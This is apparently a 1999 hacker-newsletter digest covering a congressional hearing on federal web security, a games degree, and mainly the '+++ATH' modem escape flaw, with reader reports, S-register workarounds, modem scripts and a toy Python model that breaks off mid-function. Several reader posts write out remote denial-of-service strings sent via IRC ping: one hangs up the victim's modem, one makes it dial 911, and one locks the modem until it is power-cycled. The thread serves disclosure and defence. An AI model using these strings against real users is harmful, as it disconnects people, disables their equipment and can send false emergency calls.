vulnerable to “cyber attacks” because they lack trained personnel and don’t follow security plans, federal officials warned a congressional committee today. 
Few people have adequate training to defend government websites, and those who do seldom work in government for long, three panelists told the House Science Committee’s subcommittee on technology. The security agencies “train people at government expense and the private sector waves a bigger paycheck and takes them away,” said Keith Rhodes, technical director with the General Accounting Office. No One Follows Advice In addition, government security experts often find their advice isn’t followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers. “It is imperative that federal agencies implement vigorous security programs,” Rhodes said. Hacker attacks like the recent defacing of the Senate web site are well documented, but information about attempts to access sensitive intelligence information is “very sketchy,” said Michael Jacobs, a deputy director of the National Security Agency. No Crowing, No Leads Hackers are often nearly impossible to trace unless they boast of their actions. In the most common type of attack, hackers overwhelm web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake web site that appears to be the official site, as happened earlier this month to the Senate site. “We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,” Jacobs said. -=- Federal Computer Weekly; House member suggests regular network security reports BY DIANE FRANK (diane_frank@fcw.com) Federal agencies may soon be required to submit regular reports to Congress on the security status of their networks, much as they now report their Year 2000 compliance. At a House Technology Subcommittee meeting today covering reasons why federal World Wide Web sites and systems are vulnerable to cyberattacks, Rep. Connie Morella (R-Md.) 
said that in her revision of the Computer Security Act of 1987 she plans to include a requirement for agencies to report to Congress regularly the steps they are taking to secure their sites and systems. All three witnesses at the hearing supported Morella's suggestion as a way to spur agencies to move beyond planning security measures and into implementing them. Testifying at the hearing were Keith Rhodes, director of the Office of Computer and Information Technology Assessment at the Accounting and Information Management Division of the General Accounting Office; Michael Jacobs, deputy director of information systems security at the National Security Agency; and National Institutes of Standards and Technology director Ray Kammer. "Security needs to stop being an afterthought," Rhodes said. "The value of reporting would be in a standardization of agencies' ability to report," he said. If agencies know the questions Congress will ask, they will better understand the fundamental IT implementation steps they must take, he said. Many agencies in the national security community already submit such reports and have found it helpful to undergo regular security assessments, Jacobs said. Rhodes, Jacobs and Kammer also suggested that the new computer security bill require federal agencies to use security expertise developed by NIST and NSA instead of "recommending" such steps, as the current act does. @HWA 97.0 Teesside University Offers Degree in Warez ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by Warez Dude The University of Teesside will soon offer a four year degree in warez. Courses will obviously include programing but also the history of warez, good game design and other topics to prepare graduates for entry into the booming computer game industry. 
BBC http://news.bbc.co.uk/hi/english/education/newsid_377000/377341.stm Teesside University http://www.tees.ac.uk/ BBC; Education Compulsory games for students The courses will prepare students for a career in the games industry A university computer department is taking down notices saying that it is forbidden to play games - and replacing them with new signs saying that it is going to become compulsory. The University of Teesside is introducing a degree course in designing computer games, which will mean four years of playing and building games and writing essays on such subjects as the history of computer games. For serious addicts of screen games, there is a course unit dedicated to the appreciation of games, which will involve comparing the relative merits of the latest releases and classics such as Sonic the Hedgehog and Super Mario. Expanding market The course tutor, Matthew Holton, says that the new qualification, which will have links with games companies, will provide graduates for the expanding jobs market in the computer games industry. "The course has been compiled with a great deal of input from experts in the games industry so graduates from these degrees may have no problem walking into jobs," he said. "People don't realise how large the computer games industry has become - or that some of the best games are developed in Britain." The course has been designed as practical training for a career in designing computer games, with students spending their time learning about how to make games and considering which approaches produce the best results. Serious endeavour Mr Holton, who expects the course to attract serious games enthusiasts, says that assessing students' efforts will not be problematic. "There are plenty of academic criteria that can be applied to such a course, such as assessing the quality of art work, lighting, animation, interaction and the user interface." 
The university is offering two degree courses for computer games - one in the creative design for games and the other in computer programming. But even though the courses are dealing with games, a university spokesman emphasised that these were not "Mickey Mouse" subjects, but were serious vocational courses serving a growing sector of the economy. @HWA 98.0 FREE DefCon WebCasts ~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by angus Yesterday HNN mentioned that HNC Network would be providing a webcast of DefCon for $29.95. These sites will also be broadcasting live audio and video streams of selected speakers, interviews and video live from the show floor. These feeds are FREE to the public. Pirate Radio UK http://www.pirate-radio.co.uk Hacksec http://www.hacksec.org 99.0 Old Modem Flaw Still Haunts Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 25th 1999 From HNN http://www.hackernews.com/ contributed by pbradely Hayes, the old modem manufacturer, may not live any longer but its legacy lives on. Hayes originally had the patent on the escape sequence "+ + + ATH" (without the spaces). It would appear that many modem manufacturers are still not paying the royalties for TIES (Time Independent Escape Sequence). As discovered years ago this escape sequence will force many modems to go offline or into command mode forcing a reboot. An excellent DoS attack. MacInTouch has an interesting new report on this OS independent problem. If you find that you are susceptible to this ancient flaw you can try changing the value of the S2 register to something greater than 127. (Consult your modem manual on how to do this.) 
Macintouch Report http://www.macintouch.com/modemsecurity.html BugTraq Archive Sept 1998 http://geek-girl.com/bugtraq/1998_3/0916.html Macintouch; Modem Guard Mode/Security Defect 1.Problem Description 2.Workarounds 3.Background Info Important note: The incredible modem defect described below makes it impossible for many people to even view certain character sequences without triggering the bug. As a result we have been forced to change the modem command strings in all the examples below, inserting spaces between the plus signs. The actual command strings have no spaces or quotes. Problem Description Date: Sun, 20 Jun 1999 15:01:47 -0400 From: "Mohammad A. Haque" Subject: Global Village modem exploit? Apparently there seems to be a problem with Global Village modems where you can cause it to execute modem commands remotely. If you send a computer an AT command in a packet that another remote machine responds to (i.e. ctcp, ping, icmp) the modem on that machine does that command. For example, while on irc if I sent the command /ctcp SomeOne ping + + +ATH0, SomeOne's machine would respond to the ping and as a result his/her modem would hang up right after that. It just doesn't stop there. Imagine sending out /ctcp SomeOne ping + + + + ATH0ATADT911. Is this a known problem with Global Village modems? Mohammad A. Haque Subject: new denial of service attack? Date: Mon, 21 Jun 1999 From: [MacInTouch reader] Hi there! I was playing around this weekend and found what appears to be a denial of service attack which works with dreadful effectiveness on iMacs and pretty much any other Mac with certain Global Village modems. It was essentially pointed out to me by a couple of kid phreakers, and at first I dismissed it until I watched them repeatedly knock a couple of iMac and other GV users off the net. Hopefully, you guys know all about this stuff, and there was a bug fix released that neither I nor my guinea pig tester could find. But just in case you don't... Modem? 
Yes, this attack seems to exploit a firmware issue. Apparently, the Global Village modem in the iMac as well as a few other external modems are susceptible. I don't have the resources to test different modems, but I suspect that the problem is going to be found in every GV with the same chipset. Symptom: Immediate hangup/disconnection upon receiving the signal. Technical description of the setup: Modems have two modes- command mode, where they will process commands issued to them, and connect mode, where they simply pass data. When you dial another modem and a connection is made, the modem switches to connect mode by default. When you wish to hang up, a signal is sent which forces the modem into command mode so that it can interpret commands, and then processes the hangup command as issued from the computer. The process for switching a modem from connect mode to command mode is simple- there must be silence on the connection for a specified amount of time, followed by the + (plus) symbol repeated 3 times (+ + +) followed by an equal silent pause. The pause is known as "Guard Time," to ensure that your modem doesn't accidentally hang up whenever it encounters the string "+ + +" in regular communications. Additionally, most modems can only accept the command mode string when it comes from the DTE (serial side) of the connection rather than the remote side. Although I've yet to confirm it, it would appear that the affected modems have their guard time duration value set to zero- meaning that the string should throw their modems into command mode without any silence on the line before or after the switch string. 
The exploit: In simplest terms, if I can send something to a computer connected by one of these modems which will be repeated back byte for byte, there's a fair chance that the command mode string (+ + +) will not be broken up by the characters encapsulating it within a packet (if on a PPP connection) I don't fully understand PPP encapsulation, I would think that that alone would be enough to protect against this sort of attack... but I've seen that it isn't. Add it up: If I had a super carefully constructed ICMP message, maybe a web page with a hidden form, or a malformed client to client protocol message in an IRC session which contains '+ + +ATH0,' and some software protocol in your mac bounces it back to me.... and I can have your Mac send + + +ATH0 to its modem... the ATH0 is of course the Hayes AT command to hang up immediately. I won't even address the possibility that such a request could be used to totally alter the modem's configuration in its onboard NVRAM, which would wreak further havoc. Defense? My first reaction would be to check the value of whatever is in the S12 register of the modem. This can be checked by feeding "AT&V" into zterm or another terminal emulator when the modem is in command mode. I haven't been able to find a tester who's got an affected modem *and* a working knowledge of Zterm or any other terminal emulator, so I'm really hung up on this one- no pun intended. I am expecting to find the value set to 0. Changing this value should eliminate the problem- it will introduce guard time to the string that the modem expects to receive. Because of the nature of PPP encapsulation, the modem would never receive the command-mode string until it was legitimately sent from the PPP driver itself at the end of the session. In English, adding something like, "S12=50" to your modem init string should fix it. I can't remember what the default guard time is supposed to be, and I've switched to a DSL connection- no modems handy. 
One possible side effect of this fix is that if the guard time is set too high, the modem will ignore legitimate hangup requests from the PPP program. ... So far I've just seen some kids using this attack on IRC servers... they broadcast it across entire channels and see who drops off. ... From: flowerpt Date: Mon, 21 Jun 1999 10:15:02 -0400 Subject: "modem security flaw" This isn't a new problem. When I was working tech support back in '94 a few modem manufacturers were doing this, what they called TIES (Time Independent Escape Sequence). They basically skipped the guard time. Back then, it was to avoid paying royalties to Hayes, who long ago realized the guard time was essential for reliable communications. I suppose they have a patent on it. Some jolly folks on usenet had "do you need a new modem? + + +ATH" in their .sig. When people used terminal connections... I don't remember the exact figure, but when we calculated the odds of it occurring randomly, it was about once per gigabyte. At the time, that seemed huge. Now, it seems likely to occur to a good number of people each day. Hopefully, this is all just a bad INIT string. -Bill Date: Mon, 21 Jun 1999 09:10:10 -0600 Subject: Modem Security Problem... From: "Darron Froese" Ric, This is nothing new at all. Many modems on many different computers (on many different operating systems) are at risk here. Some estimate 10%-20% while others estimate it's closer to 30%-50%. Take a look at the bugtraq archives for more detailed info: 1998_3/0916.html You can follow the thread from there... -- Darron Subject: TIES modems and the escape sequence guard time Date: Mon, 21 Jun 1999 11:16:29 -0400 From: Bill Coleman AA4LR ... Hayes did, indeed, have a patent on this technology, and they stringently defended it. Since the demise of Hayes, it is unclear who now owns this patent. 
As for the occurrence of this problem, when I was at Hayes and the TIES modems surfaced, Hayes initiated a protracted search for documents which ended in + + +ATH. (The carriage return is required) The search proved fruitless. However, Hayes started ending all of their press releases and other documents with + + +ATH. This practice continued right up until the liquidation of Hayes earlier this year. ... Bill Coleman, AA4LR, PP-ASEL Mail: aa4lr@radio.org Date: 21 Jun 99 09:04:11 PDT From: David Anderson Subject: Modem Security Flaw Hey Ric, As you may know Global Village did not build the modems for the iMac, late model Wallstreets/Lombard or B&Ws. We did build some modems for the early Wallstreets and G3 beige boxes. QA is looking at the subject of remote denial of access as we speak and if we find anything with our modems we will post it on the web site. Subject: iMac modem security flaw -- documentation suggests otherwise Date: Mon, 21 Jun 1999 15:16:45 -0400 From: Josh Brannon I have an iMac and have not yet had an opportunity to test the modem security issue you documented today (6/21/99), but with the iMac came a document called "AT Commands.pdf" that documents the AT Commands for the "Apple Internal Modem" (whatever that means -- iMac is never explicitly stated), and in it it states clearly, "In order to prevent the modem from responding to '+ + +' (called the 'escape sequence') it requires a one second pause before and after the sequence. Without the pause, the modem treats the '+ + +' sequence as data rather than a command." This seems to be at odds with the reports that users are giving, and if nothing else suggests that the security issue documented is not how Apple intended the modem to work. 
Josh Brannon Date: Mon, 21 Jun 1999 19:25:21 -0400 From: Jack Rodgers Subject: GV Modems and A T H After reading the comments on send + + + A T H to some modems, I tried to send myself an email with the subject and body being "+ + + A T H" minus the quotes and spaces. The sending disrupted the modem and seemed to cause a cycling on and off. This is on a new B&W 400 Mhz G3 and a newly installed GV Teleport Internal 56K modem and Eudora Pro 4.2 beta. So, who's at fault? The GV Modem, Eudora.... Jack Rodgers Subject: Modem Security Flaw Date: Mon, 21 Jun 1999 11:57:07 -0700 From: Travis Beals In response to one of the emails posted in the discussion about the Modem Security Flaw, I did a quick check on my Rev. A iMac's modem. Using Microphone LT, I used the AT&V command to check the value of the S12 register, and found that it defaults to 50, not 0, as some had supposed. Other than installing the standard Apple modem firmware updates, I have made no modification to my modem's settings. I also checked the iMac 56K modem script to make sure it does not set S12 to 0 (it doesn't). Although I have not (to my knowledge) experienced the modem DoS (denial of service) attack, I do not know whether my modem is immune. If the guard time of 50ms specified in S12 is correctly implemented, there SHOULD be no problem. -Travis Subject: Modem Security Flaw Date: Mon, 21 Jun 1999 23:18:40 -0500 From: Marcus Aanerud I just wanted to confirm the modem security flaw with a Global Village 56K modem (Upgraded to V.90). As an experiment, I sent an e-mail with the escape code at the end of it, including the carriage return, and it promptly kicked me offline, just as it was supposed to be done sending the message. Heh... whoops! Marcus Aanerud Subject: Re: Modem Security Flaw Date: Mon, 21 Jun 1999 10:52:43 -0500 From: Jonathan 'Wolf' Rentzsch Greetings! ... About "Modem Security Flaw". Assuming you can execute arbitrary modem commands remotely, here's a great command: "+ + +ATS3=128". 
This takes the modem offline ("+ + +"), and sets the first newline character to decimal 128 ("S3=128"). It turns out the modem uses the newline character to determine when a command has been completed and executed. Usually this value is set to 13, which is the ASCII code for "return". However, modems will strip the high bit of incoming ASCII characters in command mode. This act makes it impossible to send characters through to the modem whose value is greater than decimal 127. You've just made it impossible to execute *any* commands sent to the modem. On external modems, you need to cycle the modem's power switch to get your modem back. On a computer with an internal modem (iMac, B&W G3), you need to restart!

-- Jonathan 'Wolf' Rentzsch

Date: Tue, 22 Jun 1999 10:49:42 -0400
From: Aaron Bratcher
Subject: Modem Security Flaw

I purchased an Apple G3 Internal modem after purchasing my blue/white G3 Tower. Someone on IRC showed me how they could control my modem using the /ctcp command that was described by another reader. (btw: I cannot even put that command into this e-mail message because I am dialed up and it causes a disconnect when I send it.) Unfortunately, it is not because of the S12 register contents. After reading about that possibility, I downloaded ZTerm to check and found that my S12 register was set to 50. As a further check, I modified my modem script to set the S12 register to 50 just before dialing in. This too had no effect. Apparently this is a bigger bug than simply an init string. This shows that there are problems in the firmware.

-- Aaron Bratcher

Date: Wed, 23 Jun 1999 01:38:25 -0500
From: pasupati
Subject: modem hangups

This hangup problem affects the Motorola ModemSurfer 56k modem upgraded to V.90... I set S12=50 and it doesn't correct the problem. Motorola is out of the modem business so there is no help on their site.
Date: Tue, 22 Jun 1999 22:49:30 -0700
From: filmman
Subject: Modem Security Flaw

I've confirmed the security flaw with my Global Village 56K external modem (upgraded to v.90). I sent myself an email with the "+ + + A T H " command (minus the quotes and spaces) followed by a carriage return, and I was immediately knocked offline as the message was sent. Using ZTerm, I used "AT&V" to check the S12 register, and it is 050. So apparently, the guard time of 50ms doesn't prevent the modem from being disconnected. Either that, or it's not being implemented for some reason.

Interestingly, while I was reading your reader reports on the security flaw, I was knocked offline!

Laz

Date: Tue, 22 Jun 1999 20:06:26 -0400
From: Scott Lahteine
Subject: Modem Security Flaw

Re the modem security flaw: I had a problem months ago where a friend had sent the + + + A T H inside an email, and for a week I thought my ISP was hanging up on me! I finally tracked it down to the code in the email, and promptly cringed. My modem is a SupraExpress 56K external, and I'd guess that many other modems are afflicted.

Scott Lahteine

Date: Wed, 23 Jun 99 12:36:12 CST
Subject: Modem Flaw
From: (JOSH BARTON)

I tried to look at the page regarding modem flaws. I kept getting disconnected while trying to view the page. I found that most odd. Every time it started to load my modem would disconnect. As it turns out, all of the examples on the page were tripping the modem just as the flaw said. I am using a Global Village Speakerphone 33.6. I worked around it by dialing into my ARA server and using MacIP to tunnel the IP stuff into my AppleTalk protocol.

I found it interesting that something just posted in the HTML would be able to disconnect the modem. This leaves the door open for a hacker to put hidden code into a web page that could permanently disable a Global Village modem by disrupting its ROM image.
Josh Barton

Date: Thu, 24 Jun 1999 05:58:19 +1000
From: David Monroe
Subject: KILLING MY MODEM

I don't know what you had on the modem report page - I tried several times to read it but my express modem disconnected and PPP froze up. No problems elsewhere - just on this link.

David Monroe
Boda Farm
BELLTHORPE 4514
Australia

Date: Wed, 23 Jun 1999 18:07:13 -0500
From: Matt
Subject: Modem Flaw

Well, it appears the flaw is not limited to just GV modems. I have a BestData 56k Speakerphone modem connected to a SuperMac S900, and emailed myself the + + + A T H command in the subject and the body and was kicked offline immediately. "Widespread problem" could be an understatement with something so simple able to kick so many people. Many thanks to MacInTouch for making us aware of this and providing workarounds for it.

Matt Perkins
Michigan USA

Date: Wed, 23 Jun 1999 18:18:45 -0700
From: John W Baxter
Subject: Modem escape sequence note (ongoing discussion)

Some readers have mentioned that S12 does contain 50 on certain modems. Others have mentioned that the same modems have the escape sequence A T H flaw. And one reader set S12 to 50 and found that doing so didn't help.

None of this is surprising: a modem may very well implement S12 and let it hold values without using the register for anything. On a modem with the usual implementation of the guard time for the + + + escape sequence, S12 contains the time. On modems which don't implement the guard time, S12 holds a number unrelated to the escape sequence--and probably unrelated to anything else.

--John

Date: Wed, 23 Jun 1999 23:03:04 -0400
From: Carl Foner
Subject: Help

First off, I love MacInTouch. It's about as much a daily ritual as brushing my teeth. I read with interest the note about modem problems. I clicked on the link to read the story, it started loading, but then my PPP connection dropped. I thought it was odd, so I tried it again. Same problem.
It happened another 10 or so times, before I tried going through several diagnostics, checking settings, cables, etc. After no luck I went back online and tried looking at some other stuff. No problem. I went around for 10 or 20 minutes and things were fine. Then, I went back to the modem problems story. In about 10 seconds my connection dropped. I tried a couple more times and got the same response. I'm sure you'll agree that my modem having trouble getting to a story about modem trouble is more than a little ironic. Any thoughts?

Thanks,
Carl Foner

Date: Wed, 23 Jun 1999 17:19:44 -0500
Subject: "modem flaw"
From: "Robert Westerman"

Whenever I click on the link for "modem flaw" it drops my connection and I can never make it to the article. This really is a modem flaw. Is it me or is it Memorex???

Thank you,
Robert Westerman

Date: Thu, 24 Jun 1999 23:46:53 +0100
Subject: Macintosh Modem Woes
From: "John Gibbs"

Ric,

Just on a whim I tried sending the "+++" "ATH" commands to myself, via email... As you can see from the way I wrote them, they caused my modem to hang up immediately. The odd thing is, my modem is a generic V.90 modem for the PC. The brand itself is DCS or some such; I picked it up at a local computer (read PC) fair here in London. I guess it uses the same chipset as Apple's/GV's (I believe my unit uses a Rockwell chipset).. It would seem that this bug affects a good number of modems.

However, the good news is that Massimo Valle's tip works great even on el-cheapo no-name modems like mine.. I think I speak for everyone when I give a whole-hearted THANKS! to Massimo.

Regards,
-John
London, UK

Date: Thu, 24 Jun 1999 11:36:50 -0400
From: Yann
Subject: Modem flaw on SupraExpress 56k too

Hi!

The string "+ + + A T H", without the spaces, when sent in the subject line of an e-mail message, with Eudora Light, disconnected my Diamond Multimedia SupraExpress 56k V.90 immediately. Adding S2=127 to the init string fixes it.
Apple and Diamond need to release fixed ARA scripts for this ASAP.

- Yann Duguay

Date: Thu, 24 Jun 1999 23:12:55 -0400
From: Richard Outerbridge
Subject: modem flaw weaselling

1999-06-24 22:57:46 EDT

The devil is in the details... the Apple pdf file describing modem commands ("AT Commands for the Apple Internal Modem") only promises that the S12 register will control the modem's response to the escape sequence. Quote:

S12 register (Guard time) .... If any characters are detected during this time, the OK will not be sent. Note that sending of the OK result code does not affect entry into command mode.

In other words, my modem, which exhibits the DOS vulnerability, is behaving exactly according to its specifications: the value in S12 only determines whether or not the modem sends back OK in response to the escape sequence, NOT whether or not it enters command mode in response to the escape sequence. I detect the presence of patent lawyers... class-action lawsuit, anyone?

And yes, adding "S2=128" to all my init strings seems to be an effective workaround for my purposes.

outer

Date: Thu, 24 Jun 1999 22:42:42 -0500
From: Brian Alletto
Subject: modem security flaw

Add the Zoom 56K Dualmode modem, model 2945 to your list of modems affected by the security flaw.

Brian Alletto
balletto@sprintmail.com

Date: Thu, 24 Jun 1999 19:46:50 -0700
From: Joe
Subject: Modem Security Flaw & Viking Modems

Hi Guys,

Guess what? My new Viking External v.90 modem has the bug. I could not send email to myself with the subject: + + + A T H....Got knocked off immediately, but had no problem sending the escape command in the body of the message. I'm calling Viking right now and digging out the ole trusty Hayes Optima 33.6

Thanks for the tip.......Keep up the good work.
Joe

Workarounds

Date: Mon, 21 Jun 1999 14:26:26 -0400
Subject: iMac escape code
From: "Chris Dembitz"

For iMac users using Ircle (an irc client) the excellent freeware irc script package Hipscript will protect against any /ctcp-based DoS attack that uses the + + + code, in addition to providing many other useful features. I personally tested this with an iMac today, and it worked flawlessly.

Chris

From: Richard Smith
Subject: Modem Security Flaw
Date: Wed, 23 Jun 1999 13:28:18 +1200

Another S register to be aware of (like S12 for the guard time) is S2. This is the register that actually holds the escape character; there is no reason why you cannot change that to something other than a +. Decent PPP modem control software should allow you to change this setting within them without a problem, i.e. ATS2=27 (27 is the escape key on the keyboard; cannot remember what the + is at the moment, but using AT&V should tell you (assuming + is still set)).

Regards
Richard Smith
Customer Support
The Zones Online

Subject: modem security flaw - the final workaround
Date: Wed, 23 Jun 1999 09:05:04 +0200
From: Massimo Valle

I want to confirm the modem security flaw. On my iMac receiving a ctcp ping + + +ATH0 causes the modem to disconnect. Also sending a "/ctcp nickname ping + + +ATH0" to another user causes my iMac modem to disconnect.

I have a workaround that works apparently without side effects. The tip is to disable the escape sequence "+ + +" by setting the S2 register to 127. This is the correct setting for disabling the escape sequence, as reported in the "AT commands" manual. I've modified the original iMac modem script adding S2=127 and all seems to work fine. Sending and receiving a ctcp ping with + + +ATH0 no longer disconnects my iMac modem. Also the PPP disconnects correctly when I request "Disconnect" from Remote Access. I think this works also for G3 and PowerBook G3.

enjoy it!!

Massimo Valle
ITALY

Date: Wed, 23 Jun 1999 18:34:25 -0500
From: Matt
Subject: Modem Flaw Workaround Works!
Another note for your readers: Massimo Valle's solution of adding S2=127 to the modem init string works great. I tested it twice by removing the string and re-sending the + + + A T H command to myself by email...kicked right off immediately. Replaced the sequence in the init string, sent again, nothing at all happened, it sent normally.

Thanks Massimo!!

Matt Perkins
Michigan USA

Date: Thu, 24 Jun 1999 01:46:31 -0400
Subject: modem flaw -- followup
From: "Jason Y. Kim"

Confirmed! Setting S2 register to 128 (manual says anything ABOVE 127 will work) fixed the modem problem on my iMac. I can now send email to myself with the modem hangup command in the subject line and body without getting immediately disconnected. And I can still disconnect manually whenever I want.

THANK YOU MACINTOUCH.

--argonaut

Date: Thu, 24 Jun 1999 12:38:24 -0400
Subject: iMac Modem Security Fix ready for download
From: "Chris Dembitz"
To: Ric Ford

I have modified the two iMac modem scripts with the suggested modification of adding S2=128 to the init string. I made an AppleScript installer that will replace the older versions with these (unsupported) modified versions. It is available at [imacscriptupdate.sit]

It is in Stuffit 5 format. Please note this is an unsupported, unwarranteed fix.

Hope this helps

--
Christopher J. Dembitz
General Manager
NetRamp Internet Services, Inc.
Tidewater, Virginia's Only All-Mac ISP

Date: Fri, 25 Jun 1999 10:24:56 -0400
Subject: Update to script update
From: "Chris Dembitz"

I have updated the iMac script update installer so it now gives the option to reinstall the old scripts (since those were getting copied over without being backed up). The url to download it has not changed.

Chris

Date: Thu, 24 Jun 1999 22:30:56 -0400
From: Cristian
Subject: Quick Guide: Solving Modem Bug (DoS)

Hi Ric!

Thanks for such a good followup on the Modem Bug...
After spending an hour trying to understand what exactly should be done on my Internal Apple 56k modem (350 BW G3) to fix the problem, I concluded:

5 easy steps:

1. Get offline!
2. Launch ZTerm (or similar terminal program)
3. Type ATZ enter (resets modem to default settings)
4. Type ATS2=128 enter (sets S2 register to 128, disabling escape sequence)
5. Type AT&W&W1 enter (stores the new settings to default)

Now, to verify this worked, switch your modem off/on (or shut down if internal). Open ZTerm, type ATZ enter and then type AT&V enter. This will display your default settings. You want S2 (or S02) to be equal to 128. You'd probably read: S02:128

-Cristian Viola.

Date: Thu, 24 Jun 1999 11:48:32 -0700
From: Jim Stoneburner
Subject: Modem workaround problems; Hangup delay solution

Hello,

(1) Modem flaw workaround causes problems

I tried some of the recommended workarounds and found that it made my modem unusable _depending_ on which modem script I use. My modem is a Global Village Modem x2 56k external, on a PowerCenter running OS 7.6.1 and OT/PPP 1.0.1. I have two modem scripts for ARA 2.1/OT-PPP on hand, two different generations of x2 scripts from Global Village. The version 1.0.9 script worked great after I added "S2=127" to the init string (just after "S0=0"), solving the undesired disconnects if I try to send an email containing "+ + + ATHO". However, version 1.0.7 would not work. When trying to dial, the menubar "speedometer" would show data burst at 2 or 3 per second, and the process would stall. Sometimes, a restart was required to escape the process. I tried this with "S2=128", and in different places in the string of AT commands, but no luck.

(2) Hangup delays: a possible solution

Normally, I would simply use the newer script, especially since it functions with the "S2=127" workaround. However, the older script disconnects _much_ faster than the new one -- 2 seconds as opposed to 10.
I don't understand enough about these scripts to tell why the earlier version doesn't work with the modification, or why it disconnects more rapidly. Being an experimental scientist, I tried a few things....

First, I read the scripts and identified the few differences between them. I then did some experimentation by commenting out or swapping out code. This narrowed down the cause of slow disconnects to a section near the end of the script labeled "Hang up and reset the modem." (The init string made no difference, by the way.)

The revision list at the top of the v1.0.9 script includes the entry:

! 1.0.8 06/11/97 GAS Fixed hang up code and added TIES support

So, I tried replacing the subsection in v1.0.9 labeled

Escape from data to command mode using TIES + + + AT\13 command

with one from the older v1.0.7 script labeled:

Escape from data to command mode using standard + + + command.

This eliminated most of the hangup delays. Restoring the newer code, I then experimented with simply shortening the "pause" statements in this section, but this was not enough to noticeably shorten the delay.

Perhaps one of your readers can help us understand the benefits of the newer code (if any), and how to speed up the disconnects now that a major cause has been identified. I'd also be interested in whether other readers can confirm these observations. At present, I am stuck either with the newer script with its slow disconnects but a successful workaround to the defect, or the older script with its fast disconnects but no workaround.

Best wishes,
Jim

Attachment 1: Hang up code from v1.0.9 of Global Village x2 script

! Escape from data to command mode using TIES + + + AT\13 command
!
pause 60
write "+++"
pause 30
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "AT\13"
matchread 60
!
@LABEL 94
! Force a hangup
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
DTRClear
Pause 5
DTRSet
flush
!
!
! Try the hangup sequence three times otherwise declare an error
inctries
pause 120
iftries 3 101
jump 91
!
@LABEL 96
! Pause between data and command mode
pause 50
jump 94
!
!
@LABEL 98
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&F1E1\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!

Attachment 2: Hangup code from v1.0.7 of "GV x2 for ARA 2.1/OT-PPP"

! ---- Hang up and reset modem ----
!
@HANGUP
!
! If we do this too long, exit.
iftries 1225 99
!
@LABEL 90
!
settries 0
HSReset 0 0 0 0 0 0
!
@LABEL 91
!
! Try to get control of the modem
!
DTRClear
Pause 5
DTRSet
flush
!
@LABEL 94
!
! Force a hangup
!
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
@LABEL 95
DTRClear
Pause 5
DTRSet
flush
!
!
! Escape from data to command mode using standard +++ command
!
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "+++"
matchread 15
!
!
! Try the hangup sequence three times otherwise declare an error
!
inctries
iftries 3 101
jump 95
!
@LABEL 96
!
! Pause between data and command mode
!
pause 50
jump 94
!
!
@LABEL 97
!
! AT&F1 resulted in Error, try again using AT&F
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&FS0=0\13"
matchread 30
jump 101
!
@LABEL 98
!
! Got control of the modem. Recall the factory settings. If it fails, jump 97.
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
matchstr 2 97 "ERROR\13\10"
write "AT&F1S0=0\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!
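The reports above turn on one question: how does the modem decide that three plus signs in the middle of an e-mail are an escape rather than data? Baxter's point that a modem can store S12 without consulting it, Outerbridge's reading that S12 only gates the "OK", the S2=127/128 workaround, and Rentzsch's ATS3=128 lock-out all follow from the answer. The model below is an added example written for this digest; it is not firmware from Apple, Global Village or any other vendor, and it reduces a modem to the parts the thread discusses: the S2 escape character, the S3 command terminator, the S12 guard time, 7-bit command mode, and hang-up via DTR. Two detectors are modelled: the Hayes guard-time method, and a time-independent one that fires on the escape characters wherever they sit in the stream, which is how the affected modems are reported to behave. Timing is represented as the idle gap before each chunk of data rather than simulated in real time, and "disabled" is taken as any S2 value above 127, the Hayes convention the readers quote; the e-mail text is constructed for the example.

```python
import re


class Modem:
    """Toy model of a modem's escape detection, written for this example (no vendor's firmware)."""

    def __init__(self, ties=False, s2=43, s3=13, s12=50):
        self.ties = ties        # True: time-independent escape, the guard time is never consulted
        self.s2 = s2            # escape character; 43 is '+', any value above 127 disables it
        self.s3 = s3            # command terminator; 13 is CR
        self.s12 = s12          # guard time in 1/50 s units; 50 is one second
        self.online = True      # carrier up
        self.cmdmode = False    # escape recognised: incoming bytes are now commands, not data
        self.cmdbuf = ""
        self.delivered = ""     # bytes that actually went out over the connection

    def dtr_drop(self):
        """Out-of-band hangup by dropping DTR (what the ARA scripts try first)."""
        self.online = False
        self.cmdmode = False

    def feed(self, chunks):
        """chunks: list of (idle seconds before this chunk, text) arriving from the local computer."""
        for i, (idle, text) in enumerate(chunks):
            esc = chr(self.s2) * 3
            if self.cmdmode:
                self._command_bytes(text)
            elif self.s2 > 127 or esc not in text:
                self.delivered += text          # ordinary data
            elif self.ties:
                # the escape counts wherever it appears; whatever follows it is a command line
                before, _, after = text.partition(esc)
                self.delivered += before
                self.cmdmode = True
                self._command_bytes(after)
            else:
                # Hayes guard time: exactly the three escape characters, isolated by >= S12 idle on both sides
                guard = self.s12 / 50.0
                nxt = chunks[i + 1][0] if i + 1 < len(chunks) else float("inf")
                if text == esc and idle >= guard and nxt >= guard:
                    self.cmdmode = True
                else:
                    self.delivered += text
        return self

    def _command_bytes(self, text):
        for ch in text:
            code = ord(ch) & 0x7F               # command mode is 7-bit: the high bit is stripped
            if code == self.s3:
                self._execute(self.cmdbuf)
                self.cmdbuf = ""
            else:
                self.cmdbuf += chr(code)

    def _execute(self, line):
        line = line.strip().upper()
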